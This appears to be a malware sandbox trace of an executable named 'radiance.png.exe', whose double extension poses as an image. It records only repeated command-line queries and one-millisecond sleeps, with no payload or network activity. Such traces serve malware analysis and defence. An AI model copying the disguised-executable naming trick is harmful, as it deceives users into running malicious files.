	[0040.083] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb0e0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.083] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.083] Sleep (dwMilliseconds=0x1) 
	[0040.131] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb150*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.131] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.131] Sleep (dwMilliseconds=0x1) 
	[0040.171] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb1c0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.171] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.171] Sleep (dwMilliseconds=0x1) 
	[0040.218] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb230*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.218] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.218] Sleep (dwMilliseconds=0x1) 
	[0040.264] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb2a0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.264] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.264] Sleep (dwMilliseconds=0x1) 
	[0040.312] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb310*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.312] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.312] Sleep (dwMilliseconds=0x1) 
	[0040.352] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb380*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.352] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.352] Sleep (dwMilliseconds=0x1) 
	[0040.389] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb3f0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.389] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.389] Sleep (dwMilliseconds=0x1) 
	[0040.424] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb460*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.424] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.424] Sleep (dwMilliseconds=0x1) 
	[0040.468] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb4d0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.468] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.468] Sleep (dwMilliseconds=0x1) 
	[0040.514] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb540*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.514] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.514] Sleep (dwMilliseconds=0x1) 
	[0040.561] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb5b0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.561] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.561] Sleep (dwMilliseconds=0x1) 
	[0040.576] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb620*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.576] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.576] Sleep (dwMilliseconds=0x1) 
	[0040.606] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb690*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.606] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.606] Sleep (dwMilliseconds=0x1) 
	[0040.639] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb700*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.639] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.639] Sleep (dwMilliseconds=0x1) 
	[0040.685] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb770*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.685] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.685] Sleep (dwMilliseconds=0x1) 
	[0040.710] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb7e0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.710] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.710] Sleep (dwMilliseconds=0x1) 
	[0040.730] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb850*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.730] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.730] Sleep (dwMilliseconds=0x1) 
	[0040.779] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb8c0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.779] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.779] Sleep (dwMilliseconds=0x1) 
	[0040.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb930*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.813] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.813] Sleep (dwMilliseconds=0x1) 
	[0040.857] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb9a0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.857] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.857] Sleep (dwMilliseconds=0x1) 
	[0040.899] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bba10*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.899] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.899] Sleep (dwMilliseconds=0x1) 
	[0040.966] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bba80*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.966] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.966] Sleep (dwMilliseconds=0x1) 
	[0040.994] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbaf0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.994] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.994] Sleep (dwMilliseconds=0x1) 
	[0041.013] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbba0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.013] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.013] Sleep (dwMilliseconds=0x1) 
	[0041.060] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbc10*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.060] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.060] Sleep (dwMilliseconds=0x1) 
	[0041.170] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbc80*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.170] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.170] Sleep (dwMilliseconds=0x1) 
	[0041.216] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbcf0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.216] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.216] Sleep (dwMilliseconds=0x1) 
	[0041.263] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbd60*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.263] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.263] Sleep (dwMilliseconds=0x1) 
	[0041.299] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbdd0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.299] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.299] Sleep (dwMilliseconds=0x1) 
	[0041.313] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbe40*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.313] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.313] Sleep (dwMilliseconds=0x1) 
	[0041.334] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbeb0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.334] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.334] Sleep (dwMilliseconds=0x1) 
	[0041.341] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbf20*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.341] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.341] Sleep (dwMilliseconds=0x1) 
	[0041.375] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bbf90*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.375] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.375] Sleep (dwMilliseconds=0x1) 
	[0041.419] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc000*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.419] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.419] Sleep (dwMilliseconds=0x1) 
	[0041.437] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc070*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.437] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.437] Sleep (dwMilliseconds=0x1) 
	[0041.464] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc0e0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.464] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.464] Sleep (dwMilliseconds=0x1) 
	[0041.466] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc150*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.466] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.466] Sleep (dwMilliseconds=0x1) 
	[0041.513] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc1c0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.513] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.513] Sleep (dwMilliseconds=0x1) 
	[0041.533] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc230*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.533] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.533] Sleep (dwMilliseconds=0x1) 
	[0041.556] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc2a0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.556] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.556] Sleep (dwMilliseconds=0x1) 
	[0041.626] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc310*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.626] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.626] Sleep (dwMilliseconds=0x1) 
	[0041.638] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc380*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.638] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.638] Sleep (dwMilliseconds=0x1) 
	[0041.654] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc3f0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.654] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.654] Sleep (dwMilliseconds=0x1) 
	[0041.670] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc460*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.670] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.671] Sleep (dwMilliseconds=0x1) 
	[0041.684] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc4d0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.684] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.684] Sleep (dwMilliseconds=0x1) 
	[0041.701] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc540*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.701] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.701] Sleep (dwMilliseconds=0x1) 
	[0041.715] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc5b0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.715] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.715] Sleep (dwMilliseconds=0x1) 
	[0041.731] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc620*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.731] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.731] Sleep (dwMilliseconds=0x1) 
	[0041.747] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc690*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.747] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.747] Sleep (dwMilliseconds=0x1) 
	[0041.766] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc700*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.767] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.767] Sleep (dwMilliseconds=0x1) 
	[0041.779] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc770*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.779] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.779] Sleep (dwMilliseconds=0x1) 
	[0041.793] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc7e0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.793] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.793] Sleep (dwMilliseconds=0x1) 
	[0041.810] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc850*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.810] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.810] Sleep (dwMilliseconds=0x1) 
	[0041.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc8c0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.825] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.825] Sleep (dwMilliseconds=0x1) 
	[0041.864] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc930*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.864] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.864] Sleep (dwMilliseconds=0x1) 
	[0041.872] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bc9a0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0041.872] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0041.872] Sleep (dwMilliseconds=0x1) 
	[0042.090] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bca10*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.090] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.090] Sleep (dwMilliseconds=0x1) 
	[0042.114] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bca80*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.114] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.114] Sleep (dwMilliseconds=0x1) 
	[0042.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bcaf0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.136] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.136] Sleep (dwMilliseconds=0x1) 
	[0042.159] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1900c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.159] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.159] Sleep (dwMilliseconds=0x1) 
	[0042.174] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190138*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.175] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.175] Sleep (dwMilliseconds=0x1) 
	[0042.189] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1901a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.189] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.189] Sleep (dwMilliseconds=0x1) 
	[0042.246] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190218*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.246] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.246] Sleep (dwMilliseconds=0x1) 
